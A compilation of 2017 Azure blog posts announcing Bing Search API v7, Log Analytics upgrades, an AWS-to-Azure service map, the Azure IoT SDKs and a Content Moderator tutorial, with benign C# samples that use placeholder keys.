Bing Search API v7 and Bing Custom Search are now generally available

This post was authored by The Microsoft Cognitive Services Team.

Microsoft Cognitive Services enables developers to augment the next generation of applications with the ability to see, hear, speak, understand, and interpret needs using natural methods of communication.  
 
Today, we are announcing the general availability of Bing Custom Search API and Bing Search API v7. Showcased at Microsoft Ignite 2017 just last month, these APIs are now both available on the Azure Portal. 
 
Let’s dive into the features and how to get started.

Bing Custom Search lets you create a highly customized web search experience that delivers more relevant results from your targeted web space, through a commercial-grade service. 
 
We listened to your feedback about the preview version we announced at Build 2017 and addressed the need for customized search solutions with Bing Custom Search. Businesses of any size, hobbyists and entrepreneurs can design and deploy web search applications for any possible scenario.
 
For example, Amicus has recently released a platform that changes the way charitable aid is funded and delivered, showing donors where every dollar is spent and giving non-profits real-time tools to report and measure performance. This allows donors to fund ‘projects’ instead of blindly giving money to an organization, and non-profits to build project requests based on measurable outcomes. This transition presented a unique challenge: how could donors research and learn about the projects and activities performed by non-profits? Amicus needed to help donors learn about, find, and fund projects that were relevant and of interest to them, something too complicated for traditional search engines.

With Bing Custom Search, part of Microsoft Cognitive Services, Amicus has been able to identify its own set of relevant web pages in advance: when users have a single concept of interest (like ‘water’, ‘education’ or ‘India’), Bing Custom Search is able to deliver highly relevant results in the context of global aid.

“This is exactly what our audience needs in order to learn about a broader range of important work performed by relief organizations, beyond those the donors currently know about. Bing Custom Search, part of Microsoft Cognitive Services, delivers a ‘Learn and Find’ experience in ways never before possible,” says Beth Katz, Chief Product Officer at Amicus.
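
To give developers a feel for the API, here is a minimal C# sketch of a Custom Search call. The endpoint shape and the customconfig query parameter follow the Bing Custom Search v7 documentation; the subscription key and configuration ID are placeholders you would replace with your own values.

using System;
using System.Net.Http;
using System.Threading.Tasks;

class CustomSearchSample
{
    static async Task Main()
    {
        using (var client = new HttpClient())
        {
            // Placeholder key; copy yours from the Azure portal resource.
            client.DefaultRequestHeaders.Add("Ocp-Apim-Subscription-Key", "YOUR-SUBSCRIPTION-KEY");

            // customconfig identifies the custom search instance you defined in the portal.
            string url = "https://api.cognitive.microsoft.com/bingcustomsearch/v7.0/search" +
                         $"?q={Uri.EscapeDataString("water")}&customconfig=YOUR-CONFIG-ID";

            string json = await client.GetStringAsync(url); // webPages.value holds the results
            Console.WriteLine(json);
        }
    }
}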
 
For more information about Bing Custom Search general availability pricing and included quantities for the Trial Tier, please visit the Bing Custom Search Pricing page. 
 
For more information about preview keys you might have, please refer to the related documentation. 
 
We’re also excited to announce the general availability of the Bing Search APIs v7, which allow you to bring the immense knowledge of the planet to your applications. Results come back fast, with improved performance for queries on the Bing Web Search API. 

We are pleased to announce several new updates to the program including new sorting and filtering options for finding specific results in trending topics or image searches, better error messages to ease troubleshooting and improve problem query diagnosis, and updated documentation to make it easier to bring the power of Bing Search APIs to your applications.

The v7 Bing APIs include the following services (a sample call in C# follows the list):

Bing Web Search API (webpage, pricing page, and upgrade guide) offers enhanced search details from billions of web documents. 
Bing Image Search API (webpage, pricing page, and upgrade guide) includes thumbnails, full image URLs, publishing website info, image metadata, and more. 
Bing Video Search API (webpage, pricing page, and upgrade guide) includes useful metadata such as the creator, encoding format, video length, view count, and more. 
Bing News Search API (webpage, pricing page, and upgrade guide) includes authoritative images of the news article, related news and categories, trending topics, provider information, article URLs, and dates images were added. 
Bing Autosuggest API (webpage, pricing page, and upgrade guide) helps users complete queries faster by adding intelligent type-ahead capabilities to an app or website. 
Bing Spell Check API (webpage, pricing page, and upgrade guide) helps correct spelling errors, recognizing the difference among names, brand names, and slang, and understanding homophones as they’re being typed. 
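
To give a sense of what calling these endpoints looks like, here is a minimal C# sketch against the Bing Web Search v7 endpoint; the subscription key is a placeholder.

using System;
using System.Net.Http;
using System.Threading.Tasks;

class BingWebSearchSample
{
    static async Task Main()
    {
        using (var client = new HttpClient())
        {
            // Placeholder key; copy yours from the Azure portal resource.
            client.DefaultRequestHeaders.Add("Ocp-Apim-Subscription-Key", "YOUR-SUBSCRIPTION-KEY");

            string url = "https://api.cognitive.microsoft.com/bing/v7.0/search?q=" +
                         Uri.EscapeDataString("Microsoft Cognitive Services");

            string json = await client.GetStringAsync(url); // raw JSON; webPages.value holds the results
            Console.WriteLine(json);
        }
    }
}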

Please check out the documentation, migration guide, and pricing links listed above, which will help you understand how to handle existing v5 keys and migrate from API v5 to API v7. 
 
For questions or feedback, please visit Stack Overflow and Azure Support.

-The Microsoft Cognitive Services Team
Source: Azure

Azure Log Analytics workspace upgrades are in progress

If you’re currently using Azure Log Analytics to monitor your environments for availability and performance, be aware that we’re rolling out new enhancements and changes for Log Analytics, including the new and improved query language, so that you can take appropriate action if necessary. To take advantage of these enhancements, you’ll need to upgrade your workspaces. The upgrade is currently available in these regions: WCUS, SEAU, SEA, WEU, EJP, SUK, CID, and CCAN.

The upgrade process converts all saved searches, alerts, and views to the new query language. About 50 percent of all Azure Log Analytics workspaces have been upgraded by now, and thousands of customers are enjoying the simple yet powerful query language.

Upgrading your workspace

This upgrade introduces an improved search experience, powered by a highly scalable platform. The new experience includes an interactive and expressive query language, machine learning constructs and a portal for advanced analytics, offering a multiline query editor, full schema view and rich visualizations to help you get deeper insights from your data. Learn more about the new query language.

To take advantage of the following language benefits and more, you’ll need to upgrade your Log Analytics workspace:

Simple yet powerful. Easy to understand, similar to SQL, with constructs that read like natural language.
Full piping language. Extensive piping capabilities where any output can be piped to another command, letting you create complex queries that were not possible previously.
Search-time field extractions. Calculated fields at runtime let you apply complex calculations to extended fields and then use them in additional commands, including joins and aggregations.
Advanced joins. Ability to join tables on multiple fields, using inner and outer joins, and join on extended fields.
Date/time functions. Advanced date/time functions that give you greater flexibility.
Smart Analytics. Advanced algorithms to evaluate patterns in datasets and compare different sets of data.
See more information in “Why the new language?”.
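
As an illustration of the piping style described above, the query below filters the last hour of heartbeat records and then aggregates them per computer. It is wrapped in a minimal C# call to the Azure Log Analytics REST API mentioned later in this post; the workspace ID and Azure AD bearer token are placeholders, and the sketch assumes the v1 query endpoint.

using System;
using System.Net.Http;
using System.Net.Http.Headers;
using System.Text;
using System.Threading.Tasks;

class LogAnalyticsQuerySample
{
    static async Task Main()
    {
        const string workspaceId = "YOUR-WORKSPACE-ID"; // placeholder
        const string bearerToken = "YOUR-AAD-TOKEN";    // placeholder

        // A piped query: each stage's output feeds the next stage.
        const string query = "Heartbeat | where TimeGenerated > ago(1h) | summarize count() by Computer";

        using (var client = new HttpClient())
        {
            client.DefaultRequestHeaders.Authorization = new AuthenticationHeaderValue("Bearer", bearerToken);

            var body = new StringContent($"{{\"query\":\"{query}\"}}", Encoding.UTF8, "application/json");
            var response = await client.PostAsync(
                $"https://api.loganalytics.io/v1/workspaces/{workspaceId}/query", body);

            Console.WriteLine(await response.Content.ReadAsStringAsync()); // tables/rows JSON
        }
    }
}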

Notes:

To execute the upgrade process, you must have Owner access rights to the workspace.
The workspace upgrade and the new Log Analytics language are not currently available in Fairfax (Azure Government). The upgrade in Fairfax will start in a few months, and a separate communication will be sent about it.

Experience changes after you upgrade

Some experiences work differently after the workspace upgrade. We have made an effort to call these changes out clearly so that you can take the necessary actions, if needed. You can find more details on the known issues and FAQs page.

My Dashboard is being deprecated in favor of View Designer and Azure Dashboards. Existing tiles become read-only.
Power BI integration is replaced with a new process. Any existing schedules will be disabled.
ARM templates can be used to create and configure Log Analytics workspaces. The versions of the upgraded API and examples of tasks you can perform are available here.
Alert actions using webhooks and runbooks will need to be updated to conform to a different response format.
Deprecation of Log Search API and PowerShell Cmdlet (December 31, 2017). Any use of Log Search API and Get-AzureRmOperationalInsightsSearchResults Cmdlet should be migrated to Azure Log Analytics REST API and Invoke-LogAnalyticsQuery PowerShell Cmdlet using the new query language.

Upgrade rollout schedule

The new Log Analytics language and the deprecation of the old language require that all workspaces be upgraded. We are rolling out the upgrade to workspaces that have not yet been upgraded, according to this schedule:

New workspace creation (week of October 16, 2017). New workspaces are created with the new Log Analytics language. You can no longer create workspaces that use the legacy language.

Automatic workspace upgrade (starting the week of October 30, 2017). We will start rolling out automatic workspace upgrades; all workspaces that haven’t been upgraded will be automatically upgraded to the new Log Analytics language. This process will be gradual and carried out region by region.

Notes:

If you have upgraded your workspaces already, you don’t need to worry about automatic upgrades.
Although the automatic upgrade in WCUS and WEU regions will start in a few months, you can follow the banner in your workspace and upgrade it now.

Additional resources:

New and improved Log Analytics announcement
Azure Log Analytics query language
Known issues and FAQs
Log Analytics documentation
How to upgrade
Known issues and frequently asked questions

If you have questions, please contact us.
Source: Azure

Cloud Service Map for AWS and Azure Available Now

Today, we are pleased to introduce a new cloud service map to help you quickly compare the cloud capabilities of Azure and AWS services in all categories. Whether you are planning a multi-cloud solution with Azure and AWS, or simply migrating to Azure, you will be able to use this service map to quickly orient yourself with the services required for a successful migration. You can use the service map side-by-side with other useful resources found in our documentation.

Excerpt from the Compute section of the Cloud Service Map for AWS and Azure

The cloud service map (PDF available for download) is broken out into 13 sections to make navigation between each service simple:

Marketplace – Cloud marketplace services bring together native and partner service offerings in a single place, making it easier for customers and partners to understand what they can do.
Compute – Compute commonly refers to the collection of cloud computing resources that your application can run on.
Storage – Storage services offer durable, highly-available, and massively-scalable cloud storage for your application, whether it runs in the cloud or not.
Networking & Content Delivery – Allows you to easily provision private networks, connect your cloud application to your on-premises datacenters, and more.
Database – Database services refer to options for storing data, whether it’s a managed relational SQL database that’s globally distributed or multi-model NoSQL databases designed for any scale.
Analytics and big data – Make the most informed decision possible by analyzing all of the data you need in real time.
Intelligence – Intelligence services enable natural and contextual interaction within your applications, using machine learning and artificial intelligence capabilities that include text, speech, vision, and search.
Internet of Things (IoT) – Internet of Things (IoT) services connect your devices, assets, and sensors to collect and analyze untapped data.
Management & monitoring – Management and monitoring services provide visibility into the health, performance, and utilization of your applications, workloads, and infrastructure.
Mobile services – Mobile services enable you to reach and engage your customers everywhere, on every device. DevOps services make it easier to bring a higher quality app to market faster, and a number of engagement services make it easier to deliver performant experiences that feel tailored to each user.
Security, identity, and access – A range of capabilities that protect your services and data in the cloud, while also enabling you to extend your existing user accounts and identities or provision entirely new ones.
Developer tools – Developer tools empower you to quickly build, debug, deploy, diagnose, and manage multi-platform, scalable apps and services.
Enterprise integration – Enterprise integration makes it easier to build and manage B2B workflows that integrate with third-party software-as-a-service apps, on-premises apps, and custom apps.

The guidance is laid out in a convenient table that lets you easily locate and learn more about each service you are most interested in. For each entry, you can quickly see the service name, a description, and the corresponding service names in AWS and Azure. We’ve also provided hyperlinks for each Azure service.

Beyond service mapping, it’s worth noting that the Azure documentation provides a large array of additional resources to help app developers be successful with Azure. Here are just a few links to help get you started:

Downloadable PDF of the Cloud Service Map for AWS and Azure
Build and host your first web or mobile app using the languages, tools, and platform you love
Use relational database-as-a-service to host your high-performance and data-driven apps
Manage and monitor apps to help diagnose issues, improve performance, and assess usage
The Developer’s Guide to Microsoft Azure eBook

Thanks for reading and keep in mind that you can learn more about Azure by following our blogs or Twitter account. You can also reach the author of this post on Twitter.
Source: Azure

Benefits of using the Azure IoT SDKs, and pitfalls to avoid if you don’t

Azure IoT provides a set of open-source Software Development Kits (SDKs) to simplify and accelerate the development of IoT solutions built with Azure IoT Hub. Using the SDKs in prototyping and production enables you to:

Develop a “future-proof” solution with minimal code: While you can use protocol libraries to communicate with Azure IoT Hub, you may come back to this decision later and regret it. You will miss out on a lot of upcoming advanced features of IoT Hub and spend time redeveloping code and functionality that you could get for free. The SDKs support new features from IoT Hub, so you can incorporate them with minimal code and ensure your solution is up-to-date.
Leverage features designed for a complete software solution and focus on your specific need: The SDKs contain many libraries that address key problems and needs of IoT solutions such as security, device management, reliability, etc. You can speed up time to market by leveraging these libraries directly and focus on developing for your specific IoT scenario.
Develop with your preferred language for different platforms: You can develop with C, C#, Java, Node.js, or Python without worrying about protocol-specific intricacies. The SDKs provide out-of-box support for a range of platforms, and the C SDK can be ported to new platforms.
Benefit from the flexibility of open source with support from Microsoft and community: The SDKs are available open source on GitHub and we work in the open. You can modify, adapt, and contribute to the code that will run your devices and your applications.

Get started with the SDKs! The rest of this blog provides more details for IoT cloud and device developers on why and how you can use the Azure IoT SDKs, as well as recommended best practices for developing IoT solutions. Code snippets from the SDKs are shown to demonstrate concepts. Here is where you can find a comprehensive list of our SDKs.

Future proof for new IoT Hub features

Developers who prefer to use protocol libraries to develop custom solutions can use the REST, AMQP, and MQTT APIs exposed by IoT Hub. However, developers using these low-level protocols must deal with the intricacies of implementing complex device-to-cloud communication patterns. In addition, the IoT industry is quickly evolving past simple scenarios. Essential features like device management, security, and digital twins require interfaces at a higher level of abstraction. Relying on protocol libraries means you will need to reimplement those abstractions later.

With the SDKs, your solution is future-proof with less hassle down the road. The SDKs expose simple protocol agnostic APIs for advanced features of IoT Hub so you can leverage new features with minimal code. For example, IoT Hub released a file upload feature which allows devices to upload files to the cloud. To use this feature in your solution, you only need to update the SDKs to a version that supports this feature, and make the call to IoTHubClient_UploadToBlobAsync() in your solution (API shown for C SDK). Some features come for free. Instead of implementing a retry logic for your solution, you get the industry best practice for retry logic – exponential backoff with jitter – as the default. This is much faster than writing and maintaining your own custom implementation for these advanced features.
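
For comparison, here is roughly what the same upload looks like in the C# SDK; a minimal sketch assuming a device connection string and a local file named telemetry.log.

using System.IO;
using System.Threading.Tasks;
using Microsoft.Azure.Devices.Client;

class FileUploadSample
{
    static async Task Main()
    {
        // Placeholder connection string; copy the real one from your IoT Hub device.
        var deviceClient = DeviceClient.CreateFromConnectionString(
            "HostName=...;DeviceId=...;SharedAccessKey=...", TransportType.Mqtt);

        using (var source = File.OpenRead("telemetry.log"))
        {
            // The SDK obtains a SAS URI from IoT Hub and uploads to the associated blob storage.
            await deviceClient.UploadToBlobAsync("telemetry.log", source);
        }
    }
}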

The Azure IoT Hub Device Provisioning Service automates device registration and configuration. The SDKs provide a high-level interface that abstracts details like the transport method. They also provide a security client that groups authentication mechanisms and hardware modules under one common interface. Device application developers can focus on customizing the first-run experience instead of spending their time on complex hardware-level security. Support for the Device Provisioning Service is available in the C SDK in public preview and will come to the other languages as well. 

Complete software solution for your needs

Regardless of the complexity of your IoT scenario, you need to develop the software on physical things or gateways to be deployed in the field, as well as back-end service software for device monitoring and management. The SDKs cover both ends. In addition, they are designed as a complete software solution for device management, security, reliability, diagnostics, bandwidth savings, and quality. You can dedicate your energy to developing for your specific need instead of reimplementing these features. Here are some of the value propositions for using the SDKs in your solution.

Device management

The SDKs provide out-of-box device management infrastructure through features released by IoT Hub, including device twins and direct methods. Operations for managing device twins and invoking methods are straightforward, with the SDKs taking care of authentication, twin synchronization, and change identification for you on both the device and service sides.

You can develop quickly by leveraging building blocks for storing and querying device metadata, reporting and synchronizing state information, and invoking and handling methods for operations like firmware updates, configuration changes, and command execution.

How-to guides like Get started with device twins and Use direct methods complement the open source samples describing the use of the APIs.
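
To give a flavor of the device-side API, here is a minimal C# sketch that reports a twin property and registers a direct-method handler; the connection string, property name, and method name are illustrative placeholders.

using System;
using System.Threading.Tasks;
using Microsoft.Azure.Devices.Client;
using Microsoft.Azure.Devices.Shared;

class DeviceManagementSample
{
    static async Task Main()
    {
        var deviceClient = DeviceClient.CreateFromConnectionString(
            "HostName=...;DeviceId=...;SharedAccessKey=...", TransportType.Mqtt); // placeholder

        // Report state through the device twin; the back end can query it later.
        var reported = new TwinCollection();
        reported["firmwareVersion"] = "1.2.0";
        await deviceClient.UpdateReportedPropertiesAsync(reported);

        // Handle a direct method invocation, e.g. a "reboot" command from the service side.
        await deviceClient.SetMethodHandlerAsync("reboot", (request, context) =>
        {
            Console.WriteLine("Reboot requested.");
            return Task.FromResult(new MethodResponse(200));
        }, null);
    }
}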

Security

Azure IoT provides a secure end-to-end Internet of Things platform. Secure your IoT deployment discusses IoT Hub’s security infrastructure in detail. As a developer, you can establish secure connection with devices quickly using the SDKs. IoT hub offers several secure authentication mechanisms including SAS tokens and X.509 certificates. If you choose to use security tokens, the SDKs can generate tokens without requiring any special configuration for most scenarios. If you choose to use X.509, the SDKs provide a device client that supports use of X.509 certificates and a service client to register devices that use X.509 certificate identities.

As Azure IoT continues to improve security, new support for the Device Identifier Composition Engine (DICE) and different kinds of Hardware Security Modules (HSMs) was recently added (this blog provides details). The SDKs evolve with Azure IoT Hub to make security simpler, and now offer a library that enables the use of different HSMs through a simple interface to DICE- and Trusted Platform Module (TPM)-compatible secure storage. This library makes it trivial to integrate devices in scenarios involving secure provisioning of devices at scale with the Device Provisioning Service mentioned earlier.

Reliability

The SDKs include several reliability features as well.

Retry policy for unsuccessful device-to-cloud communication is one example, addressing the intermittent and unreliable connectivity inherent to IoT devices. The SDKs offer the industry best practice for retry policy, exponential back-off with random jitter, along with the option to customize it, taking into account the battery constraints of devices.

The SDKs also implement different connectivity features such as customizable keep-alives times to efficiently maintain cloud-to-device connectivity, support for connection to IoT Hub from networks behind a proxy, turning tracing on or off for the transports, etc. This document describes different connectivity features in the C SDK.
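
For example, in the C# SDK the default retry policy can be overridden through SetRetryPolicy; a minimal sketch with illustrative timing values follows.

using System;
using Microsoft.Azure.Devices.Client;

class RetryPolicySample
{
    static void Main()
    {
        var deviceClient = DeviceClient.CreateFromConnectionString(
            "HostName=...;DeviceId=...;SharedAccessKey=...", TransportType.Mqtt); // placeholder

        // Exponential back-off with jitter is the default; override it only if your
        // device's power or bandwidth budget calls for different timings.
        deviceClient.SetRetryPolicy(new ExponentialBackoff(
            10,                              // retry count
            TimeSpan.FromMilliseconds(100),  // minimum back-off
            TimeSpan.FromSeconds(10),        // maximum back-off
            TimeSpan.FromMilliseconds(100))); // delta back-off
    }
}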

Diagnostics

In addition to providing simple APIs for IoT Hub features, the SDKs also provide diagnostics to aid debugging. The SDKs handle error reporting for error codes emitted by IoT Hub, including exceeded quotas, authentication error, throttling, device not found, etc.

Bandwidth savings

Depending on your IoT scenario, sending data too frequently may incur avoidable costs. The SDKs provide several out-of-the-box solutions for bandwidth savings. Buffering allows the device to store data when connectivity is poor instead of attempting retries. Batching reduces the number of messages transmitted by merging information from multiple messages into a single batch of messages, thus reducing network bandwidth usage. Multiplexing reduces the number of connections by having multiple devices share the same connection.
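
As an illustration, the C# SDK exposes batching directly through SendEventBatchAsync, shown here over AMQP with made-up readings; the connection string is a placeholder.

using System.Collections.Generic;
using System.Text;
using System.Threading.Tasks;
using Microsoft.Azure.Devices.Client;

class BatchingSample
{
    static async Task Main()
    {
        var deviceClient = DeviceClient.CreateFromConnectionString(
            "HostName=...;DeviceId=...;SharedAccessKey=...", TransportType.Amqp); // placeholder

        // Buffer readings locally, then transmit them as a single batch.
        var batch = new List<Message>
        {
            new Message(Encoding.UTF8.GetBytes("{\"temp\":21.3}")),
            new Message(Encoding.UTF8.GetBytes("{\"temp\":21.7}"))
        };
        await deviceClient.SendEventBatchAsync(batch);
    }
}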

Quality

The SDKs are developed by Microsoft engineers and go through a rigorous engineering process to ensure quality. Features are covered with both unit and end-to-end tests. Prior to each bi-weekly release, the SDKs are tested with a gated build system for supported platforms to ensure no regression.

Broad language and platform support

Depending on the IoT scenario and your developer experience, you may have a preferred language or platform. The SDKs have you covered. Broad language and platform support with protocol flexibility allows you to develop in your preferred environment without worrying about protocol-specific intricacies. Five languages are currently supported: C, C#, Java, Node.js, and Python. We strive to maintain consistency of APIs across the five languages, as much as language-specific constructs allow.

Each language is maintained as a public repository on GitHub, including sample code and documentation. In addition, the SDKs are available as binary packages from NuGet for C#, Maven for Java, apt-get for some Linux distributions, npm for Node.js, and pip for Python.

The SDKs are regularly tested on the following platforms (when languages apply):

Linux (Ubuntu, Debian, Raspbian)
Windows
MBED
Arduino (Huzzah, ThingDev, FeatherM0), FreeRTOS (ESP32, ESP8266)
.NET Framework 4.5, UWP, PCL (Profile 7 – UWP, Xamarin.iOS, Xamarin.Android), .NET Micro Framework, .NET Standard 1.3
Intel Edison

You can find an exhaustive list of the OS platforms the various SDKs have been tested against in the Azure Certified for IoT device catalog. If a platform is not supported, our C SDK is developed in ANSI C99 and can be ported easily following this guide.

Open Source with Support from Microsoft and community

Good open source practice and regular release

The Azure IoT SDKs team follows open source best practices and works in the open. If you want to contribute back, simply create a pull request following these guidelines. The engineers also monitor questions on Stack Overflow and GitHub closely to resolve any issues in a timely manner. You can track our progress through commits on the public repositories.

The SDKs are developed in the master branch of their respective GitHub repositories; a new version is stamped on a bi-weekly basis and packages are released at the same time, which means a fast turnaround for new feature releases, bug fixes, and merge requests. Features supported by the SDKs and the development roadmap are published on each repo’s GitHub page, also updated on a bi-weekly basis with each release.

Long Term Support

Some developers are wary of behavioral or functional breaking changes that may affect devices in the field. The Azure IoT Hub service is a PaaS that exposes versioned APIs, guaranteeing continuity of behavior and function when using a specific version of the service API. To extend this commitment to the client level, the SDKs offer a Long Term Support (LTS) version. LTS branches are shielded from unwanted changes; they still receive all security fixes and critical bug fixes. A new LTS version is created every 6 months with a one-year lifetime.

Support plans

You are supported by Microsoft as part of your Azure subscription. Depending on the issue’s priority and severity, you can reach out to Azure Support directly via various plans.

Documentation

Documentation for various development needs is available. The Azure IoT Development Center provides a single landing page for developers, linking to resources such as training content, full API documentation, and how-to guides. The developer guide in the Azure documentation provides how-to tutorials to help you get started with various IoT Hub features. The GitHub repositories contain instructions on how to get started from source code and list the features supported in the SDKs. A list of sample applications showing how to use various IoT Hub features is also provided. You can provide feedback on documentation via GitHub issues and comments directly on the online documentation.

Best practice for using IoT Hub without the SDKs

The Azure IoT SDKs are licensed under the MIT license, giving you all the flexibility you need for your development, with no restrictions on modification and redistribution.

If you still choose or need to use a third party protocol client or your own solution, here are some guidelines to avoid security breaches and ensure reliability.

Access control and authentication with IoT Hub
IoT Hub endpoints
Choose a communication protocol
Manage device identities
Device to Cloud features guide
Cloud to Device feature guide
Send and Receive messages

Send device to cloud messages
Read device to cloud messages
Use custom endpoints and routing rules
Send cloud to device messages
IoT Hub messages construct

Understand device twins
Understand device methods
Schedule jobs on multiple devices
IoT Hub query language
Upload files from a device
Understand quotas and throttling

In addition to these, you will need to bear in mind your IoT solution’s specifics, considering device constraints and communication limitations. What should your retry and buffering logic be to save battery and limit bandwidth usage? How and where do you securely store device credentials? How will you provision devices at scale?

Getting started with Azure IoT SDKs

Excited about using the SDKs for development? Getting started is simple. This guide provides an overview for developing with our SDKs. Navigate to the GitHub repository of your preferred language, learn about the supported features and get started with samples. You can also download the SDKs as binary packages from popular package registries and run the sample applications on your device with a few steps. For example, follow this tutorial to get started with our C SDK.
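
For instance, sending a first device-to-cloud message from C# takes only a few lines; a minimal sketch with a placeholder connection string:

using System;
using System.Text;
using System.Threading.Tasks;
using Microsoft.Azure.Devices.Client;

class GettingStartedSample
{
    static async Task Main()
    {
        var deviceClient = DeviceClient.CreateFromConnectionString(
            "HostName=...;DeviceId=...;SharedAccessKey=...", TransportType.Mqtt); // placeholder

        var telemetry = new Message(Encoding.UTF8.GetBytes("{\"temperature\":22.5}"));
        await deviceClient.SendEventAsync(telemetry); // device-to-cloud message
        Console.WriteLine("Telemetry sent.");
    }
}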
Source: Azure

Microsoft Cognitive Services – How Content Moderator helps to boost online safety

Microsoft Cognitive Services enables developers to augment the next generation of applications and enhance their ability to see, hear, speak, understand, and interpret needs using natural methods of communication. Think about the possibilities: being able to add vision and speech recognition, emotion and sentiment detection, language understanding, and search, to applications without having any data science expertise.

Content Moderator is part of Cognitive Services, allowing businesses to use machine-assisted moderation of text and images, augmented with human review tools.

What are Content Moderator’s capabilities?

Content Moderator helps track, flag, and assess potentially offensive and unwanted content on social media websites, chat and messaging platforms, enterprise environments, gaming platforms, and more, and flag that content for human review. The following capabilities are included:

Image moderation: The image moderation API enhances your ability to detect potentially offensive or unwanted images through machine-learning based classifiers, custom lists, and optical character recognition (OCR).
Text moderation: The text moderation API helps you detect potential profanity in several languages. You don’t have to restrict matching to the terms included with the service. You can create custom lists with terms specific to your business domain.
Video moderation: The video moderation capability is currently in private preview on Azure Media Services. It enables detection of potential adult content in videos.
Human review tool: The human review tool when used together with the moderation APIs allows you to implement human-in-the-loop processes while benefiting from the cost and speed efficiencies of machine learning.

How Lightspeed Systems powered their online safety tool for schools

Lightspeed Systems provides software systems to help schools protect their students from inappropriate and offensive content. It turned to Content Moderator from Microsoft and found it to be more effective than alternative technologies in identifying the offensive content. It was also easy to integrate with.

“Compared with other solutions, Content Moderator does a better job of categorizing images and assessing whether they contain adult content…I consider it a tool I can really rely on,” says Rob McCarthy, Founder of Lightspeed Systems.

To learn more, please take a look at the Lightspeed Systems case study.

Getting started

We provide several tutorials to help you get started quickly with Content Moderator.

How to start with the human review tool

Follow the steps in the review tool quick-start to check out the automated moderation and human-in-the-loop capabilities without writing a single line of code. The review tool internally calls the automated moderation APIs and presents the items for review right within your web browser. You can invite other users to review, track pending invites, and assign permissions to your team members.

How to leverage the automated moderation APIs

If you sign up for the review tool, you will find your free tier key in the Credentials tab under Settings, as shown in the following screenshot:

Use your API key and follow the quick-start steps outlined in the Image API and Text API sections. Use the review API to auto-moderate content in bulk and review the tagged images or text within the review tool. Provide your API callback endpoint so that you get notified when reviewers submit their decisions. This feature allows you to automate the post-review workflow by integrating with your own systems.

Content moderation in an E-commerce scenario

Let’s say I’ve got an e-commerce site and need to learn how to use the Content Moderator platform along with additional Cognitive Services such as the Computer Vision and Custom Vision services.

The purpose would be to combine machine assisted classification with human review capabilities to classify E-commerce catalog images.

I would like to use machine-assisted technologies to classify and moderate product images in these categories:

Adult (Nudity)
Racy (Suggestive)
Celebrities
US Flags
Toys
Pens

Overall, I’ll need to do the following:

A. Sign up and create a Content Moderator team.

B. Configure moderation tags (labels) for potential celebrity and flag content.

C. Use Content Moderator's image API to scan for potential adult and racy content.

We can also go further and use the Computer Vision API to scan for potential celebrities, leveraging the Custom Vision service to scan for the possible presence of flags and present the nuanced scan results for human review and final decision making.
 

A. First, let’s create a team

I can either sign up with my Microsoft account or create an account on the Content Moderator web site.

Let’s navigate to the Content Moderator sign up page.

Click Sign Up

To create a team, I’ll see a "Create Team" screen. I need to give my team a name. If I want to invite colleagues, I can do so by entering their email addresses.

More information can be found on the Quickstart page about signing up for Content Moderator and creating a team. Note the Team ID from the Credentials page.

B. Let’s define custom tags

Please refer to the Tags article to add custom tags. In addition to the built-in adult and racy tags, the new tags allow the review tool to display the descriptive names for the tags. In our case, we define these custom tags (celebrity, flag, us, toy, pen):

Now, let’s list my API keys and endpoints:

The tutorial uses three APIs with corresponding keys and API endpoints.
The API endpoints differ based on your subscription region and your Content Moderator review team ID.

Keep in mind that this walkthrough is designed to use subscription keys in the regions visible in the following endpoints, so be sure to match the API keys with the region URIs; otherwise the keys may not work with these endpoints:

// Your API keys
public const string ContentModeratorKey = "XXXXXXXXXXXXXXXXXXXX";
public const string ComputerVisionKey = "XXXXXXXXXXXXXXXXXXXX";
public const string CustomVisionKey = "XXXXXXXXXXXXXXXXXXXX";

// Your end points URLs will look different based on your region and Content Moderator Team ID.
public const string ImageUri = "https://westus.api.cognitive.microsoft.com/contentmoderator/moderate/v1.0/ProcessImage/Evaluate";
public const string ReviewUri = "https://westus.api.cognitive.microsoft.com/contentmoderator/review/v1.0/teams/YOURTEAMID/reviews";
public const string ComputerVisionUri = "https://westcentralus.api.cognitive.microsoft.com/vision/v1.0";
public const string CustomVisionUri = "https://southcentralus.api.cognitive.microsoft.com/customvision/v1.0/Prediction/XXXXXXXXXXXXXXXXXXXX/url";

C. Scan for adult and racy content

The function takes an image URL and an array of key-value pairs as parameters.
It calls the Content Moderator Image API to get the adult and racy scores.
If the adult score is greater than 0.4 or the racy score is greater than 0.3 (scores range from 0 to 1), it sets the corresponding value in the ReviewTags array to true.
The ReviewTags array is used to highlight the corresponding tag in the review tool.

// ReviewTags uses the tutorial's simple KeyValuePair class (string Key/Value properties),
// not the BCL struct.
public static bool EvaluateAdultRacy(string ImageUrl, ref KeyValuePair[] ReviewTags)
{
    float AdultScore = 0;
    float RacyScore = 0;

    var File = ImageUrl;
    string Body = $"{{\"DataRepresentation\":\"URL\",\"Value\":\"{File}\"}}";

    HttpResponseMessage response = CallAPI(ImageUri, ContentModeratorKey, CallType.POST,
        "Ocp-Apim-Subscription-Key", "application/json", "", Body);

    if (response.IsSuccessStatusCode)
    {
        // Parse the adult and racy scores from the JSON response body. Blocking!
        GetAdultRacyScores(response.Content.ReadAsStringAsync().Result, out AdultScore, out RacyScore);
    }

    // "a" is the built-in adult tag; flag it when the score exceeds 0.4.
    ReviewTags[0] = new KeyValuePair();
    ReviewTags[0].Key = "a";
    ReviewTags[0].Value = "false";
    if (AdultScore > 0.4)
    {
        ReviewTags[0].Value = "true";
    }

    // "r" is the built-in racy tag; flag it when the score exceeds 0.3.
    ReviewTags[1] = new KeyValuePair();
    ReviewTags[1].Key = "r";
    ReviewTags[1].Value = "false";
    if (RacyScore > 0.3)
    {
        ReviewTags[1].Value = "true";
    }
    return response.IsSuccessStatusCode;
}
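
A hypothetical call site for this function might look like the following, assuming the tutorial's custom KeyValuePair class described above:

// Scan one catalog image and report the outcome (illustrative URL).
var reviewTags = new KeyValuePair[2];
bool ok = EvaluateAdultRacy("https://example.com/catalog/product1.jpg", ref reviewTags);
if (ok)
{
    Console.WriteLine($"Adult: {reviewTags[0].Value}, Racy: {reviewTags[1].Value}");
}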

Then I can also scan for celebrities; classify images into flags, toys, and pens; review with a human in the loop; submit batches of images; and initiate all scans.

All of the additional steps are covered in the full tutorial.

Feel free to take a look at our additional Content Moderator scenario with a sample Facebook page, in which the solution either takes down or allows publishing of images and text posted by viewers of the Facebook page.

Happy coding!

Sanjeev Jagtap
Senior Product Manager – Content Moderator
Microsoft Cognitive Services Team
Source: Azure

Unifying monitoring and security for Kubernetes on Azure Container Service

